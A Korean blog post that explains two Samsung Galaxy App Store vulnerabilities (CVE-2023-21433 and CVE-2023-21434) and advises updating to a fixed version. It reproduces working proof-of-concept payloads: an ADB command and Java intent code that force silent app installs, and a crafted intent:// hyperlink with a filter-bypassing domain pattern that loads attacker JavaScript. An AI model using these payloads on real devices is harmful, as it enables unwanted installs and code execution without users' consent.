꿈을꾸는 파랑새

Galaxy App Store(갤럭시 스토어) 이라는 것은 삼성전자에서 운영하는 타이젠, 안드로이드인 삼성 갤럭시의 ESD이며 삼성 스마트폰 안드로이드 기기에 사전 설치되어 제공되는 대체 애플리케이션 스토어입니다. Galaxy App Store와 Google App Store 모두에서 여러 Android 애플리케이션을 사용할 수 있으며 사용자는 둘 중 하나를 사용하여 특정 애플리케이션을 설치할 수 있습니다. 
해당 취약점은 022년 11월 23일부터 12월 3일까지 NCC 그룹의 연구원들이 발견
Galaxy App Store 애플리케이션에서 두 가지 취약점입니다.
CVE-2023-21433: 부적절한 액세스 제어로 말미암아 로컬 공격자가 Galaxy App Store에서 애플리케이션을 설치할 수 있음
CVE-2023-21434: 부적절한 입력 검증으로 말미암아 로컬 공격자가 웹 페이지를 시작하여 JavaScript를 실행할 수 있음
부적절한 액세스 제어로 말미암아 로컬 공격자가 Galaxy App Store에서 애플리케이션을 설치할 수 있음(CVE-2023-21433)
공급업체: 삼성
영향을 받는 버전: 4.5.44.1, 다른 버전이 영향을 받을 수 있음

자세한 내용

Galaxy App Store(갤럭시 스토어)취약점 보안 업데이트
Galaxy App Store(갤럭시 스토어)취약점 보안 업데이트

영향을 받는 시스템: Galaxy App Store(갤럭시 스토어) 안드로이드 애플리케이션(com(.)sec.android.app(.)samsungapps)

CVE:CVE-2023-21433
CVE-2023-21433 추적되며 공격자가 Galaxy App Store에서 사용할 수 있는 모든 애플리케이션을 설치할 수 있도록 허용하는 부적절한 액세스 제어
NCC는 Galaxy App Store가 들어오는 의도를 안전한 방식으로 처리하지 않아 장치의 앱이 임의의 앱 설치 요청을 보낼 수 있음을 발견
NCC의 분석가들이 공유한 PoC는 앱 스토어에 특정 타깃 애플리케이션이 포함된 인텐트를 전송해 포켓몬고 게임을 설치하도록 앱 컴포넌트에 지시하는 ADB (안드로이드 디버그 브릿지) 명령어

am start -n com.sec.android.app.samsungapps/.detail.alleypopup.AlleyDetailActivity 
--es GUID com.nianticlabs(.)pokemongo.ares 
--ez directInstall true --ez directOpen true

또는 다음 Java 코드를 사용하여 동일한 작업을 수행할 수 있음

Intent intent = new Intent();
intent.setComponent(new ComponentName("com.sec.android.app(.)samsungapps", "com.sec.android.app.samsungapps.detail.alleypopup.AlleyDetailActivity"));
intent.putExtra("GUID", "com.nianticlabs.pokemongo.ares");
intent.putExtra("directInstall", true);
intent.putExtra("directOpen", true);
startActivity(intent);

인텐트는 또한 설치 후 새 애플리케이션을 열어야 하는지를 지정하여 위협 행위자가 공격을 수행하는 방법에 대한 더 많은 선택권을 제공할 수 있음
두 번째 취약점은 CVE-2023-21434 공격자가 대상 장치에서 JavaScript를 실행할 수 있도록 하는 부적절한 입력 유효성 검사
NCC의 연구원들은 Galaxy App Store의 웹뷰에 표시될 수 있는 도메인을 제한하는 필터가 포함되어 있음을 발견 그러나 해당 필터는 제대로 구성되지 않았으며 웹 보기가 악의적인 도메인에 접근하도록 강제로 우회할 수 있음
보고서에 제시된 PoC는 크롬에서 클릭하면 악성 자바스크립트가 포함된 페이지를 열어 기기에서 실행하는 하이퍼링크
Galaxy App Store 내의 웹뷰 에는 브라우징할 수 있는 도메인을 제한하는 필터가 포함된 것으로 나타났으며 그러나 필터가 제대로 구성되지 않아 webview가 공격자가 제어하는 ​​도메인을 탐색할 수 있음
구글 크롬에서 악성 하이퍼링크를 탭 하거나 삼성 기기에 사전 설치된 악성 애플리케이션을 탭 하면 삼성의 URL 필터를 우회하고 공격자가 제어하는 ​​도메인에 대한 웹뷰를 시작할 수 있음
삼성 스마트폰 기기 장치에서 Chrome 웹 브라우저를 사용하는 동안 다음 하이퍼링크를 탭 하여 이 문제를 악용할 수 있는 문제

<h1>
<a id="yayidyay" rel="noreferrer" 
href="intent://cloudgame/monitor?monitoringHost=<host>
#Intent;action=android.intent.action.VIEW;package=com.sec.android.app.samsungapps;scheme=normalbetasamsungapps;S.android%2eintent%2eextra%2eREFERRER_NAME=http://com.sec.android(.)app.samsungapps;end">
YAYPOCYAY</a>
</h1>

<호스트>"는 공격자가 제어하는 ​​도메인으로 대체되어야 하며 악의적인 웹 사이트는 HTTPS를 통해 도메인에서 호스팅 되어야 함
도메인 이름에 "player.glb.samsung-gamelauncher(.)com"이 있어야 합니다. 예를 들어 "player.glb.samsung-gamelauncher.com.nccgroup(.)com" 도메인은 유효한 도메인임
삼성 스마트폰 사용자에게 미치는 영향
Galaxy Store(갤럭시 스토어)와 같은 시스템 권한 앱 내에서 webview에서 임의의 JavaScript 코드를 실행하면 심각한 보안 영향을 받을 수 있음
공격자의 동기에 따라 공격은 앱 UI 상호 작용, 중요한 정보에 대한 액세스 또는 앱 충돌로 이어질 수 있음
사용자 모르게 Galaxy Store(갤럭시 스토어)에서 앱을 설치하고 자동으로 실행하면 특히 공격자가 사전에 Galaxy Store(갤럭시 스토어)에 악성 앱을 업로드 하는 경우 데이터 또는 개인 정보 침해로 이어질 수 있음
CVE-2023-21433은 안드로이드 13을 실행하는 삼성 기기에서 취약한 이전 버전의 Galaxy Store 를 사용하더라도 악용할 수 없다는 점에 유의
즉 최신 버전의 구글 모바일 OS에 대한 추가 보안 보호 덕분
불행하게도 공급업체에서 더는 지원하지 않고 이전 Galaxy Store 버전(갤럭시 스토어)을 고수하는 모든 삼성 스마트폰 장치는 NCC 그룹 연구원이 발견한 두 가지 취약점에 취약
결론 그냥 잠시 삼성 갤럭시 스토어를 앱을 클릭을 해서 최신 버전으로 업데이트 하면 문제 해결
사용자가 확인할 사항
2023년 1월 1일 두 가지 결함을 수정 Galaxy App Store 용 새 버전(4.5.49.8) 이상 으로 업데이트 하면 됨

그리드형

공유하기

facebook twitter kakaoTalk kakaostory naver band